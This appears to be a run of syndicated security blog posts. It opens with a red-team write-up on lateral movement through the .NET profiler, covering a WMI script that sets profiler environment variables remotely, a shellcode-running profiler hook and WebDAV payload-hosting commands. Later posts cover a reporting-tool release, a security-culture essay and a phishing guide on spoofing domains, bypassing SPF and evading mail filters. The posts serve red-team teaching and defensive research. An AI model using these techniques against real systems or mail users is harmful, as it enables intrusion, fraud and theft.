This has been documented for some time and has been observed in use by threat actors in the wild. I ran across this blog by Bohops detailing other interesting abuses of the .NET profiling infrastructure in Windows. It references a blog by Casey Smith from 2017 detailing loading a DLL this way, and MITRE has a technique for this as well as some in-the-wild examples.

Since environment variables can be set system-wide, this also works as a form of persistence. Whenever a .NET process executes, it will load the specified DLL.

The minimum viable profiler that can abuse this is a “fake” COM server DLL that exports the function DllGetClassObject, which is the function that is used to check the CLSID of the COM server DLL. As stated above though, there’s no need to actually implement the logic of the check here, and arbitrary code can be executed instead:

Minimum viable “fake” profiler
Execution of the “fake” profiler in a .NET process

Lateral Movement:

I was talking to Lee Chagolla-Christensen (@tifkin) about ways to set these environment variables on a remote computer to load a DLL via UNC paths, and he let me know that the Win32_ProcessStartup WMI class allows for environment variables to be set for a specific process, meaning that this could be abused with a Win32_Process Create call to execute a .NET process remotely and load a .NET profiler DLL! Thanks Lee!

So I set about creating a BOF and payload to allow this to be used more easily. The results are HERE.

I modified Yaxser’s WMI Lateral Movement BOF to include a Win32_ProcessStartup class with the appropriate environment variables defined and a user-defined DLL path to enable lateral movement via the .NET profiler.

Adding environment variables to enable WMI lateral movement
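For illustration, here is a rough Python analogue (using Tim Golden’s wmi package) of what the modified BOF does: a remote Win32_Process Create call with a Win32_ProcessStartup instance carrying the profiler environment variables. The host, credentials, and paths are placeholders, and the “NAME=value” string-array format for EnvironmentVariables is my reading of the MSDN class documentation, so treat this as a sketch rather than the BOF’s actual implementation:

import wmi

c = wmi.WMI("TARGET01", user="CORP\\admin", password="Password123!")  # placeholders
startup = c.Win32_ProcessStartup.new(EnvironmentVariables=[
    "COR_ENABLE_PROFILING=1",
    "COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}",  # placeholder CLSID
    "COR_PROFILER_PATH=C:\\temp\\profiler.dll",             # placeholder DLL path
])
# Create returns the new process ID and a result code (0 on success)
pid, result = c.Win32_Process.Create(
    CommandLine="powershell.exe -NoProfile",
    ProcessStartupInformation=startup)
print(f"Create returned {result}, PID {pid}")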

Additionally, I modified Pavel Yosifovich’s example .NET profiler to be a better payload. I utilized this tutorial from ired.team to store a shellcode payload as a resource that can be hot swapped, and I used the function ICorProfilerInfo2::SetEnterLeaveFunctionHooks2 to set an enter hook on all JITed functions. The hook will load and execute the shellcode from the resource, essentially performing process hollowing, because normal functionality of the hooked function will cease indefinitely if the payload is something like a Cobalt Strike beacon.

Setting the hooks during initialization
Adding the shellcode execution to the function enter hook

In that same file, CoreProfiler.cpp, you can see all the other handy callbacks that could be used for execution primitives or even more interesting use cases. A neat example that uses the .NET profiler for evasion is Omer Yair’s InvisiShell, which monitors assembly loads in PowerShell processes to then patch out functions to disable AMSI. I believe there’s a lot of fertile ground here for further research regarding all the callbacks exposed by the CLR.

Putting it all together

When we use the payload and BOF together, you get lateral movement that looks something like this:

.NET Profiler BOF execution

You might be thinking: “Hey Dan! Didn’t you say earlier you wanted to load the payload from a UNC path?” Yes I did, good memory. Sadly, since we are using WMI, we run into the double-hop problem, meaning the process we execute on the remote machine can’t authenticate to a remote file share to pull our payload via a UNC path. That’s OK though, because the DLL can instead be loaded from a WebDAV server:

.NET Profiler BOF execution featuring WebDAV

You can even set it up to be through the beacon you are executing the BOF with by utilizing wsgidav. First execute this command to host your server locally on your workstation:

wsgidav --host=0.0.0.0 --port=80 --root=/payload/folder --auth=anonymous

and then start a reverse port forward on your beacon:

rportfwd 80 localhost 80

Now you can execute a .NET process and have your payload pulled over and executed automatically.

Conclusion

I found this “feature” of the .NET Profiler to be pretty neat, albeit a little unwieldy. You’ll see that the payload is purely for demonstration purposes. No attempts to make it evasive have been made, so Defender may eat it upon being built. Sorry!

I hope this gets folks more curious about all the cool stuff you can do with the .NET profiler though, and I’m sure there are other ways out there to remotely set environment variables to make it even more useful. I briefly looked into setx and other means of setting them via remote registry, but it seemed like the changes didn’t take effect until after a reboot. I bet there is some way to make it work though!

Many thanks again to Lee, Pavel, Yaxser, and Mantvydas for all the prior research, since the payload and BOF is really just a collage of your work.


Lateral Movement with the .NET Profiler was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Lateral Movement with the .NET Profiler appeared first on Security Boulevard.

Ticketmaster is Tip of Iceberg: 165+ Snowflake Customers Hacked

11 June 2024 at 11:15
Snowflake CISO Brad Jones

Not our fault, says CISO: “UNC5537” breached at least 165 Snowflake instances, including Ticketmaster, LendingTree and, allegedly, Advance Auto Parts.

The post Ticketmaster is Tip of Iceberg: 165+ Snowflake Customers Hacked appeared first on Security Boulevard.

Ghostwriter v4.2

10 June 2024 at 16:01

Ghostwriter v4.2: Project Documents & Reporting Enhancements

After April’s massive Ghostwriter v4.1 release, we received some great feedback and ideas. We got a little carried away working on these and created a release so big we had to call it v4.2. This release contains some fantastic changes and additions to the features introduced in April’s release. Let’s get to the highlights!

Improving Customizable Fields

Ghostwriter v4.1 introduced custom fields, and seeing the community use them so creatively was awesome. What we saw gave us some ideas for a few big improvements.

The rich text fields support the Jinja2 templating language, so loops quickly became a talking point. Looping over project objectives, findings, hosts, and other things to create dynamic lists, table rows, or sections is incredibly powerful, so we had to do it.

You can now use Jinja2-style expressions with the new li, tr, and p tags to create list items, table rows, and text sections. Here is an example of building a dynamic list inside Ghostwriter’s WYSIWYG editor.

Jinja2-style Loop in the WYSIWYG Editor

This screenshot includes examples of a few notable features. We’re using the new li tag with a for loop to create a bulleted list of findings. We have access to Jinja2 filters, including Ghostwriter’s custom filters, so we use the filter_severity filter to limit the loop to findings with a severity rating matching critical, high, or medium. The first and last bullets won’t be in the list in the final Word document.

The middle bullet will repeat for each finding to create our list. It includes the title and severity and uses the regex_search filter to pull the first sentence of the finding’s description. The use of severity_rt here is also worth a call-out. Some community members asked about nesting rich text fields inside of other rich text fields, like the pre-formatted severity_rt text for a finding. Not only can we use severity_rt inside this field, but we can also add formatting, like changing the text to bold.

Here is the above list rendered in a Word document. The pre-formatted finding.severity_rt appears with the proper color formatting and the bold formatting added in the WYSIWYG editor.

Output of the Jinja2 Loop in Microsoft Word

These additions introduced some complexity. A typo or syntax mistake could break the Jinja2 templating and prevent a report from generating, and the resulting error message wasn’t always helpful for tracking down the offending line of text. To help with this, Ghostwriter v4.2 validates your Jinja2 when you save your work, so you don’t need to worry about accidentally saving any invalid Jinja2 and causing a headache later on.

Validating the Jinja2 didn’t cover every possible issue, though. Even valid Jinja2 can fail to render if the report data causes an error (e.g., trying to divide by zero or referencing a non-existent value). To help with that, we significantly improved error handling to catch Jinja2 syntax and template errors at render time and surface more helpful information about them. When content prevents a report from generating, error messages point to the report’s section containing the problem.

In this example, a field called exec_summ contains this Jinja2 statement: {{ 100/0 }}. That’s valid Jinja2, but you can’t actually divide by zero, so rendering will always fail. With Ghostwriter v4.2’s error handling enhancements, the error message will direct us to the field name and include information we can use to track down the problem.

New Explicit Error Message for a Failed Report
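For readers who want to reproduce the two failure modes outside Ghostwriter, here is a hedged sketch using plain Jinja2 (this is not Ghostwriter’s actual validation code):

from jinja2 import Environment, TemplateSyntaxError

env = Environment()

try:
    env.from_string("{{ exec_summ }")  # invalid syntax: caught when saving
except TemplateSyntaxError as e:
    print(f"Template error on line {e.lineno}: {e.message}")

template = env.from_string("{{ 100/0 }}")  # valid Jinja2...
try:
    template.render()  # ...but rendering raises the underlying error
except ZeroDivisionError:
    print("Render-time error in field: exec_summ")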

More Reporting Improvements

Ghostwriter v4.2 also includes enhancements to the reporting engine. The most significant change is the introduction of project documents. You don’t always need to generate a full report with findings. You may need to generate other project-related documents before or after the assessment is done, like rules of engagement, statement of work, or attestation of testing documents. You could technically do this with older versions of Ghostwriter by generating a report with a different template, but that was not intuitive.

The project dashboard’s Reports tab is now called Reporting and contains an option to generate JSON, docx, or pptx reports with your project’s data. This works like the reports you’re familiar with but uses only the project data (e.g., no findings or report-specific values).

New Project Document Generation Under the Project Dashboard

We wanted to make it easier to generate project documents like this because custom fields open up many possibilities. For example, at SpecterOps, we provide clients with daily status reports after each day of testing. We can accomplish this task with a Daily Status Report field added to projects and the new project reporting feature. Consultants can now easily collaborate on updates to the daily status and then generate their daily status document from the same dashboard.

That’s not all, though. We realized one globally configured report filename would never apply to every possible document or report you might want to generate, so we made some changes. The biggest change is that your filename can now be configured using Jinja2-style templating with access to your project data, familiar filters, and a few additional values (e.g., `now` to include the current date and time). That means you can configure a filename like this that dynamically includes information about your project, client, and more:

{{now|format_datetime("Y-m-d")}} {{company_name}} — {{client.name}} {{project.project_type}} Report

That template would produce a filename like 2024-06-05 Acme Corp — SpecterOps Red Team Report.docx. That’s great for a default, but you’d probably be renaming documents often as you expanded the types of documents generated with Ghostwriter. To help with that, we made it possible to configure separate global defaults for reports and project documents.

Jinja2 Templating for Default Filenames for Report Downloads

We also added the option to override the filename per template! To revisit the daily status report example, your Word template for such a report can override the global filename template with a filename template like {{now|format_datetime("Y-m-d")}} {{company_name}} Daily Status Report.

Another enhancement for this feature is a third template type, Project DOCX. You can use this to flag Microsoft Word templates that are intended only for project documents. Templates flagged with this type will only appear in the dropdown menu on the project dashboard. This will keep them out of the list of templates for your reports.

Finally, Ghostwriter v4.2 also includes a feature proposed by community member Dominic Whewell: support for templating the document properties in your Word templates. If you set values like the document title, author(s), and company, you can now do that in your templates and let Ghostwriter fill in that information for you.

Jinja2 Templating in Document Properties

Background Tasks with Cron

Ghostwriter v4.2 also contains various bug fixes and quality-of-life improvements. There are too many to detail here, but one worth mentioning is support for cron expressions with scheduled background tasks. Previously, you could schedule tasks to run at certain time intervals, but you couldn’t control some of the finer points, like the day of the week.

You can now use cron to schedule a task on a more refined schedule, like only on a specific day of the week or only on weekdays. When scheduling a task, select Cron for the Schedule Type and provide a cron expression, e.g., 00 12 * * 1-5 to run the task every weekday at 12:00.

Using Cron to Schedule a Background Task

Check out the full CHANGELOG for all the details on this release.

Release Ghostwriter v4.2.0 · GhostManager/Ghostwriter


Ghostwriter v4.2 was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Ghostwriter v4.2 appeared first on Security Boulevard.

Building a Culture of Cybersecurity: Why Awareness and Training Matter

security culture

By Sithembile (Nkosi) Songo, Chief Information Security Officer, ESKOM

According to the Ultimate List of Cybersecurity Statistics, 98% of cyber attacks rely on social engineering. Social engineering and phishing tactics keep evolving and target a diversified audience, from executives to ordinary employees, and advanced phishing attacks can now be launched using generative AI. There has also been a shift in the motivations behind these attacks, such as financial gain, curiosity, or data theft.

Recent attacks have shown that cyber criminals continue to use various social engineering tricks that exploit human weaknesses. Attackers are moving beyond purely technological vulnerabilities, such as using automated exploits, to initiate fraudulent transactions, steal data, install malware, and engage in other malicious activities. Furthermore, it is a well-documented fact that people are the weakest link in the cybersecurity chain. Traditional security controls put more focus on technical vulnerabilities than on human-related ones, and threat actors are transitioning from system- and technology-based attacks to human-based attacks, taking advantage of an uninformed or untrained workforce by exploiting human-related vulnerabilities.

Employees often make it too easy by posting a huge amount of information about themselves, including daily status updates, activities, hobbies, travel schedules, and their network of family and friends. Even small snippets of information can be aggregated, letting bad guys build an entire record on their targets. Employees, especially those likely to be targeted, should limit what they post. Bad guys also leverage other weaknesses, such as the improper destruction of information (dumpster diving) and unencrypted data.

The three most common delivery methods are email attachments, websites, and USB removable media. Properly implemented USB policies and trained users can identify, stop, and report phishing attacks, and a workforce well educated on the different methods of social engineering is more likely to identify and stop the delivery of these attacks.

While malicious breaches are the most common, inadvertent breaches from human error and system glitches are still the root cause of most of the data breaches studied in the report. Human error as a root cause includes “inadvertent insiders” who may be compromised by phishing attacks or have their devices infected, lost, or stolen.

Entrenching a security-conscious culture is therefore extremely important in today’s digital age.

What is "Security Culture"?  

Security culture is the set of values, shared by all the employees in an organization, that determines how people are expected to perceive and approach security. It comprises the ideas, customs, and social behaviours of an organization that influence its security. Security culture is the most crucial element in an organization’s security strategy, as it is fundamental to the organization’s ability to protect information, data, and employee and customer privacy.

Perception of cybersecurity has a direct impact on security culture, and that impact can be positive or negative. It is positive when information security is seen as a business enabler and viewed as a shared responsibility rather than the CISO’s sole responsibility. It is negative when security is viewed as a hindrance or a showstopper to business or production.

A sustainable security culture requires care and feeding. It does not develop naturally; it requires nurturing and relevant investment, and it is bigger than ad-hoc events. When a security culture is sustainable, it transforms security from a series of one-off events into a lifecycle that generates security returns forever.

Security culture determines what happens with security when people are on their own. Do they make the right choice when faced with whether to click on a link? Do they know the steps that must be performed to ensure that a new product or offering is secure throughout the development life cycle?

Security culture should be engaging and should deliver value, because people are keen to participate in a security culture that is co-created and enjoyable. Furthermore, for people to invest their time and effort, they need to understand what they will get in return; in other words, the culture should provide a return on investment, such as improving a business solution or mitigating the risks associated with cyber breaches.

Culture change can be driven from the top or built bottom-up, depending on the composition and culture of the organization. A bottom-up rollout allows engaged parties to feel they are defining the way forward rather than participating in a large, prescriptive corporate program, while support from the top helps to validate the change, regardless of how it is delivered. In particular, a top-down mandate helps to break down barriers between business functions, information security, information technology, development teams, and operations, and it is one of the few ways to reach beyond the technical teams and extend throughout the business.

Organizations that have a strong cybersecurity culture have the following:
  • Senior leadership support from the Board and Exco that echoes the importance of cybersecurity within the organization.
  • A defined security awareness strategy and programme, including Key Performance Indicators (KPIs).
  • Targeted awareness campaigns that segment staff based on risk. Grouping users by risk allows messages, and the frequency of messages, to be tailored to each user group.
  • A cybersecurity champion programme, which allows a group of users embedded in the organization to drive the security message.
  • Usage of various mediums to accommodate the different ways people learn.
  • Employees who are always encouraged to report cybersecurity incidents and who know where and how to report them. An organizational culture where people are encouraged to report mistakes can be the difference between containing a cyber incident and not.
  • Measurements to test effectiveness, often done with phishing simulations.
  • Employees who have a clear understanding of what is acceptable versus what is not.
  • Information security treated as a shared responsibility instead of the CISO’s sole responsibility.

[Figure: percentage of adopted security awareness capabilities]

Security architecture principles such as defence in depth hold that the failure of a single component of the security architecture should not compromise the security of the entire system. A defence-in-depth mechanism should therefore be applied to mitigate phishing-related risks. This approach applies security in multiple layers of protection, so that if one control fails, the next layer can block or stop the phishing attack. The controls involve a combination of people, processes and technologies. User behavior analytics (UBA) should be used to augment the awareness programme by detecting insider threats, targeted attacks and financial fraud, and by tracking users' activities. Advanced phishing simulations using GEN AI should also be conducted to combat advanced phishing attacks.

Possible Measurements 

There are several measures that can be applied to gauge the level of a security-conscious culture:
  • Employees' attitudes towards security protocols and issues.
  • Behaviour and actions of employees that have direct or indirect security implications.
  • Employees' understanding, knowledge and awareness of security issues and activities.
  • How communication channels promote a sense of belonging and offer support on security issues and incident reporting.
  • Employees' knowledge of, support for and compliance with security policies, standards and procedures.
  • Knowledge of and adherence to unwritten rules of conduct related to security.
  • How employees perceive their responsibilities as a critical success factor in mitigating cyber risks.

Conclusion 

According to Gartner, by 2025, 40% of cybersecurity programs will deploy socio-behavioural principles (such as nudge techniques) to influence security culture across the organization. Recent human-based cyber-attacks, together with AI-enabled phishing attacks, make it imperative to tighten human-based controls. Promoting a security-conscious culture will play a fundamental role in transforming people from the weakest into the strongest link in the cybersecurity chain.

Building a cybersecurity culture is crucial because it ensures that everyone understands the importance of cybersecurity, adheres to the relevant information security policies and procedures, stays vigilant, and mitigates the risks associated with data breaches. Furthermore, a strong cybersecurity culture fosters better collaboration, accountability and improved security maturity.

Disclaimer: The views and opinions expressed in this guest post are solely those of the author(s) and do not necessarily reflect the official policy or position of The Cyber Express. Any content provided by the author is of their opinion and is not intended to malign any religion, ethnic group, club, organization, company, individual, or anyone or anything.

Microsoft Recall is a Privacy Disaster

6 June 2024 at 13:20
Microsoft CEO Satya Nadella, with superimposed text: “Security”

It remembers everything you do on your PC. Security experts are raging at Redmond to recall Recall.

The post Microsoft Recall is a Privacy Disaster appeared first on Security Boulevard.

Alameda Ends Cloud-Brightening Test, Overruling Staff Decision

The City Council in Alameda, Calif., voted to stop tests of a device that could one day cool the Earth. Scientists and city staff had previously concluded the tests posed no risk.

The sprayer being tested at the end of March in advance of the experiment on board the decommissioned U.S.S. Hornet in Alameda, Calif.

One Phish Two Phish, Red Teams Spew Phish

4 June 2024 at 13:52

PHISHING SCHOOL

How to Give your Phishing Domains a Reputation Boost

“Armed with the foreknowledge of my own death, I knew the giant couldn’t kill me. All the same, I preferred to keep my bones unbroken” — Big Phish

When we send out our phishing emails, we are reckoning with giants. Spamhaus, SpamAssassin, SpamTitan, Barracuda, and many more giants wish to grind your bones to bake their bread. They are big. They are scary. But they don't catch everything. Just like Edward Bloom learned, the best way to deal with giants is to make a good first impression.

What’s your name, giant? — Karl

That’s how we will deal with these giants as well. Let’s talk about proper etiquette when speaking with giants.

“He Ate My Dog”

The first opportunity a mail server has to reject your email is right at the beginning of an SMTP exchange. The server can run checks on the reputation of both your sending IP, and the domain you are claiming to be in your FROM address. In general, the main controls that will get you blocked by a good secure email gateway (SEG) are some version of the following:

  • Does your sending IP show up on a known SPAM list like Spamhaus?
  • Is the geographical location of the sending IP in another country?
  • What’s the reputation/category of the sending domain?
  • What’s the age of the sending domain?
  • Does SPF fail?

Of course, all of these checks are generally configurable, and not every SEG will perform all of them. These are just some of the most common controls I tend to suspect as the root cause of a failure at this stage in the phish's lifecycle. None of them is really all that difficult to address or bypass, so by taking them into account, we can usually ensure our phishing campaigns are not blocked at this layer.

Bypassing Sender Reputation Checks

When we attempt to deliver our message, we will be connecting to a mail server for the target email's domain, telling it who we are and who we want to send a message to, and then giving it the contents of the message. Here is an example of what that conversation looks like under the hood, with lines we control marked C: and server responses marked S:

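A minimal reconstruction of the exchange (hostnames, addresses, and the IP are hypothetical):

    S: 220 mail.fabrikam.com ESMTP
    C: EHLO mail.contoso.com
    S: 250 mail.fabrikam.com Hello [203.0.113.10]
    C: MAIL FROM:<chris@contoso.com>
    S: 250 2.1.0 Sender OK
    C: RCPT TO:<karl@fabrikam.com>
    S: 250 2.1.5 Recipient OK
    C: DATA
    S: 354 Start mail input; end with <CRLF>.<CRLF>
    C: From: Chris <chris@contoso.com>
    C: To: Karl <karl@fabrikam.com>
    C: Subject: Quick question
    C:
    C: (message body)
    C: .
    S: 250 2.0.0 Queued for delivery
    C: QUIT
    S: 221 2.0.0 Service closing transmission channel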

In general, IP address blocks are easy for us to troubleshoot because if our sending IP is blocked, the server will typically just terminate the TCP connection and we won't even be able to start this SMTP call and response. It's pretty rare to be blocked by IP right off the bat, and when it happens it typically means you're sending from an IP that is associated with sending a lot of SPAM, or that the GeoIP result for your sending IP is in a blocked country or region. If that's the case, just try sending from another IP.

The next opportunity for the server to block us is by the reputation of the domain we supply as the sending domain. Notice in our example that the sending domain is ‘contoso.com’ and is used in both the EHLO and MAIL FROM commands. These domains typically match, but they don’t have to. Feel free to tinker with mismatching these values to see how different mail servers respond.

You can think of the EHLO and MAIL FROM commands as saying “I’m a mail server for contoso.com, and I’m going to send an email from chris@contoso.com to one of your users”. At this point, the receiving server has an opportunity to accept or reject our claim by checking a few things:

  • Is contoso.com on a known SPAM list? (never going to let it through)
  • Is contoso.com explicitly whitelisted? (always going to let it through)
  • How old is the contoso.com domain?
  • Is contoso.com categorized? And if so, what category is it?
  • Has the server ever received emails from contoso.com before?
  • Does contoso.com’s MX record match your sending IP address?
  • Does a reverse DNS lookup of your sending IP resolve to <something>.contoso.com?
  • Does contoso.com publish an SPF record that includes your sending IP address?

Most mail servers will perform one or more of these checks to obtain hints about whether you can be trusted or not. Some of these hints, like reverse DNS records, will increase our reputation if they pass the check, but won’t really hurt our reputation too much if they fail. Others, like trying to spoof a domain from an IP that is not in that domain’s SPF record, will likely get us burned right away. Therefore, we should try to pass as many of these checks as we can, while avoiding techniques that could be clearly identified as a spoof.
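Most of these hints are easy to check yourself before launching a campaign. A minimal sketch using standard tooling (the domains and IP below are placeholders):

    dig +short mx fabrikam.com              # who receives mail for the target domain
    dig +short txt contoso.com              # TXT records, including any SPF policy, for our claimed sender
    dig +short -x 203.0.113.10              # reverse DNS (PTR) for our sending IP
    whois contoso.com | grep -i creation    # registration date, a rough proxy for domain age

Note that whois output formats vary by registrar, so the grep pattern may need adjusting.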

So, Which Domain Should I Use?

When choosing our sending domain, we have a few options, each with its own pros and cons. We can either spoof a domain that we do not own, or buy a domain. If we buy a domain, we can either get a brand new domain of our choosing, or buy an expired domain that was previously bought by someone else. No one method is inherently better than the others, but we should have a clear understanding of how to get the most out of each technique when making our choice.

Spoofed Domains

Pros

  • Free! ‘Nough said
  • Makes attribution difficult. You are basically framing someone else. (Note: this could be a con if you have to go through attribution and deconfliction with the blue team)
  • Probably already categorized and old enough to pass checks for newly registered domains
  • Successful spoofs can look very legitimate, and therefore boost success rates

Cons

  • Limited to existing domains that you can find
  • You may be able to use non-existent domains, but they are easy to identify and often blocked. It’s generally better to purchase in this case.
  • Most high-value domains have implemented email security settings like SPF that could make it difficult, if not impossible, to spoof without detection
  • We can’t set up our own email security settings on the domain that might boost our reputation (no control and no proof-of-ownership)
  • We have no influence over domain category or reputation

Considerations When Spoofing Domains

Does our target mail server actually check SPF?

If not, we should be able to successfully spoof just about any domain. I’ve seen several cases where, for whatever reason, SPF checks were either turned off or misconfigured so that failing SPF did not result in rejected emails. It’s often worth a shot to try to deliver a few benign emails while intentionally failing SPF to see if the server sends back an error message or says it delivered them. While you won’t receive any bounce messages or responses from recipients (those would go to the mail server for your spoofed domain), you could try putting image links or tags for remote CSS resources in the emails that point to a web server you own and track requests for these resources as potential indicators that the emails were delivered.
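As a rough sketch, those tracked resources might look like this in an otherwise benign HTML email body (the domain and paths are placeholders pointing at a web server we own):

    <img src="https://our-phish-domain.com/i/msg42.png" width="1" height="1" alt="">
    <link rel="stylesheet" type="text/css" href="https://our-phish-domain.com/c/msg42.css">

Keep in mind that many mail clients block remote images by default, so a lack of requests is not proof the message was rejected.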

Is there a similar registered domain that lacks an SPF record?

You may be able to find domains that have been registered that look very similar to your target organization’s domain, but have not been configured with any email security settings that would allow a mail server to confirm or deny a spoof attempt. In some cases, I’ve seen clients that buy up domains similar to their own to prevent typosquatting, but then forget to apply email settings to prevent spoofing. In other cases, I’ve seen opportunistic domain squatters who buy look-alike domains in case they may become valuable, and don’t bother to set up any DNS records for their domains. In either case, we can potentially spoof these domains and the mail server will have no way of knowing we don’t own them. While this might mean we are starting off with a generally low trust score, most mail servers will not outright reject messages just because the sending domain lacks a properly configured SPF record. That is because there are so many legitimate organizations that have never bothered to set one up.

Does your target organization have an expired domain listed in an ‘include’ statement in their SPF record?

Let’s say our target organization’s email domain is fabrikam.com, and we would like to spoof an internal email address (bigboss@fabrikam.com) while sending to our target users. Consider that fabrikam.com has the following SPF record as an example:

v=spf1 mx a ip4:12.34.45.56/28 include:sendgrid.net include:imexpired.net -all

This SPF record lists the hosts/IPs that are allowed to send emails from fabrikam.com. Here is a breakdown of what each piece means:

  • v=spf1: This is an SPF version 1 TXT record, used to distinguish SPF from other TXT records.
  • mx: The IP of the domain's MX (mail server) record is trusted to send emails from fabrikam.com.
  • a: The IP from a forward DNS lookup of the domain itself is also trusted.
  • ip4:12.34.45.56/28: Any IP in this small range is trusted to send emails from fabrikam.com.
  • include:sendgrid.net: Any IPs or IP ranges listed in sendgrid.net's SPF record are also trusted.
  • include:imexpired.net: Any IPs or IP ranges listed in imexpired.net's SPF record are also trusted.
  • -all: Every other sending IP not matched by a previous directive is explicitly denied from sending emails claiming to be from fabrikam.com.

As this demonstration shows, the 'include' directive in SPF allows you to trust other domains to send on your domain's behalf. For example, emailing services like sendgrid can be configured to pass SPF checks so that sendgrid can deliver marketing emails from fabrikam.com to their customers. In the case of our example, if our client previously trusted imexpired.net to send emails, but the domain has since expired, we can buy imexpired.net and add our own server to its SPF record. We will then be able to pass SPF checks for fabrikam.com and spoof internal users.
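Concretely, once we own the expired domain, we would publish an SPF record like the following (the IP is a placeholder for our own sending server):

    imexpired.net.  IN  TXT  "v=spf1 ip4:203.0.113.10 -all"

Because fabrikam.com's record says include:imexpired.net, any IP we list here now passes SPF for fabrikam.com as well.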

Can we bypass SPF protections with other technical tricks?

Depending on the receiving mail server’s configuration, there may be other ways we can spoof domains that we do not own. For example, some email servers do not require SPF alignment. This means that we can have a mismatch between the domain we specify in the ‘MAIL FROM’ SMTP command, and the ‘From’ field in the message content itself. In these cases, we can use either a domain we own and can pass SPF for, or any domain without an SPF record in the ‘SMTP FROM’ command and then choose any other domain for the email address that our target user sees in their mail client. Another trick we can sometimes use is to supply what’s known as the “null sender”. To do this, we simply specify “<>” as the sender. The null sender is used for bounce messages and is sometimes allowed by spam filters for troubleshooting.
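A rough sketch of the alignment trick at the SMTP level (domains are placeholders, and whether it works depends entirely on the receiving server's configuration):

    C: MAIL FROM:<newsletter@domain-we-own.com>
    C: RCPT TO:<karl@fabrikam.com>
    C: DATA
    C: From: Big Boss <bigboss@fabrikam.com>

Here the envelope sender passes SPF for a domain we control, while the From header, which is what the target's mail client displays, claims the spoofed domain. For the null-sender variant, the envelope sender is simply empty:

    C: MAIL FROM:<>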

SMTP is a purely text-based protocol. This means that there is often ambiguity in determining the beginning and end of each section of data, and SMTP implementations often have parsing flaws that can be abused to bypass security features like SPF and DKIM. In 2020, Chen Jianjun et al. published a whitepaper demonstrating 18 separate flaws of this kind that they discovered, affecting even some big email providers like Google:

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-You-Have-No-Idea-Who-Sent-That-Email-18-Attacks-On-Email-Sender-Authentication.pdf

https://www.usenix.org/system/files/sec20fall_chen-jianjun_prepub_0.pdf

They also published the tool they used to discover these vulnerabilities, as well as their research methodology. While they disclosed these vulnerabilities to the vendors they tested, they did not test every major SEG for all of these vulnerabilities, and you might find that some popular SEGs are still vulnerable ;)

In 2023, Marcello Salvati demonstrated a flaw in a popular email sending service that allowed anyone to pass SPF for millions of legitimate domains.

https://www.youtube.com/watch?v=NwnT15q_PS8

His DefCon talk on the subject demonstrates his research and discovery process as well. I know that there are similar flaws in some other major email sending services, but I will not be throwing them under the bus in this post. Happy hunting!

Purchasing Brand New Domains

Pros

  • We can set up SPF, DMARC, DKIM to ensure we pass these checks
  • We control the MX record so we can receive mail at this domain
  • More granular creative control over the name

Cons

  • May take some time to build a reputation before sending a campaign

Purchasing Expired Domains

Pros

  • We can set up SPF, DMARC, DKIM and ensure we pass these checks
  • We control the MX record so we can receive mail at this domain
  • More likely to already be categorized
  • You may have Wayback Machine results to help keep the current category
  • You might salvage some freebie social media accounts

Cons

  • Little control over the domain name. You can get key words but otherwise just have to get lucky on which ones become available

Considerations for any Purchased Domain

The two major advantages of using domains we own for phishing are that we can specify the mail server and the mail security settings for the domain. Controlling the mail server means we can actually have back-and-forth conversations with phishing targets if we need to, which opens up the possibility for more individualized pretexts. By setting up our own SPF, DMARC, and DKIM records, we can ensure that we pass these checks and give our emails a high probability of passing reputation-based checks.

The third benefit of owning a domain is that we can control more factors that might help us categorize the domain. Email gateways, web proxies, and DNS security appliances will often crawl new domains to determine what kind of content is posted on the domain’s main website if one exists. They then make a determination of whether to block or allow requests for that domain based on the type of site it is. Security products that include category checks like this are often configurable. For example, some organizations block social media sites while others allow employees to use social media at work. In general, most network administrators will allow certain common benign categories. A couple classic desirable categories for red teamers are ‘healthcare’ and ‘finance’. These categories have additional benefits when used for command and control (C2) traffic, though for the purposes of delivering emails, we really just need to be categorized as anything that’s not sketchy. If your domain is not categorized at all, or in a ‘bad’ category, then your campaign will be dead in the water, so here’s some tips on getting off the naughty list.

Categorizing New Domains

.US.ORG Domains

One of my favorite shortcuts for domain categorization is to register domains off the ‘us.org’ or similar top levels. Because ‘us.org’ is a domain registrar, its Bluecoat category is ‘Web Hosting’, and has been around for many years. The minute you buy one of these domains, you are automatically going to be lumped in a generally benign and frequently allowed category.

Categorize with HumbleChameleon

While Humble Chameleon (HC) was designed to bypass multi-factor authentication on phishing assessments, it also has some great features for ‘hiding behind’ benign domains. You can set HC’s ‘primary_target’ option to point at a site you would like to mimic and let the transparent proxy do the rest.

Warning: any time your domain is crawled, your server will be forwarding traffic to the impersonated site. I have seen logs on my server before where someone was scanning my site for WordPress vulnerabilities, and therefore causing my server to send the same malicious traffic to the site I was impersonating. While the chances of being sued for this are pretty low, please be aware that this technique may put you in a bit of a gray area. Choose targets wisely and keep good logs.

Categorizing with Clones and Nginx/Apache

If you’ve never used httrack to clone a site, you should really do yourself a favor and explore this absolute classic! How classic you ask? Xavier Roche first released this website cloner back in 1998 and it’s still a great utility for quickly cloning a site. Httrack saves website resources in a directory structure that is ideal for hosting with a static Nginx or Apache web server. The whole setup process can be easily scripted with Ansible to stand up clones for domain categorization.
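A minimal sketch of cloning a site for static hosting (the URL and output directory are placeholders):

    httrack "https://www.example-to-clone.com" -O ./clone "+*.example-to-clone.com/*" -v

Point your Nginx or Apache web root at ./clone and you have a categorization-ready site.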

Categorizing with ChatGPT and S3

The more modern version of static site hosting is to ask an AI bot to write your website for you, and then serve the static content using cheap cloud services like S3 buckets and content delivery networks. If you get stuck, or don’t know how to automate this process, you can just ask the robot ;)
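A rough sketch of the hosting side with the AWS CLI (the bucket name is a placeholder, and newer buckets also need their public-access settings relaxed or a CDN in front):

    aws s3 mb s3://categorization-site-example
    aws s3 website s3://categorization-site-example --index-document index.html
    aws s3 sync ./site s3://categorization-site-example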

Categorizing Expired Domains

Whenever you purchase an expired domain, you should go ahead and check its category before you buy. It’s much easier to maintain a good category than to try to re-categorize a domain, so only buy it if it’s already in a benign category. Once you buy one, you have two options to maintain the category. You can either generate some new content or re-host the site’s old content. If you want to generate new content, the AI route is probably the most efficient. However, my preferred approach is to just put the content of the old site back up on the Internet. If that content was what got the original categorization, then it should also keep it in the same category.

Categorizing with Wayback

If the expired domain you just purchased was indexed by the Wayback Machine, then you can download the old pages with a simple Ruby script:

https://github.com/hartator/wayback-machine-downloader

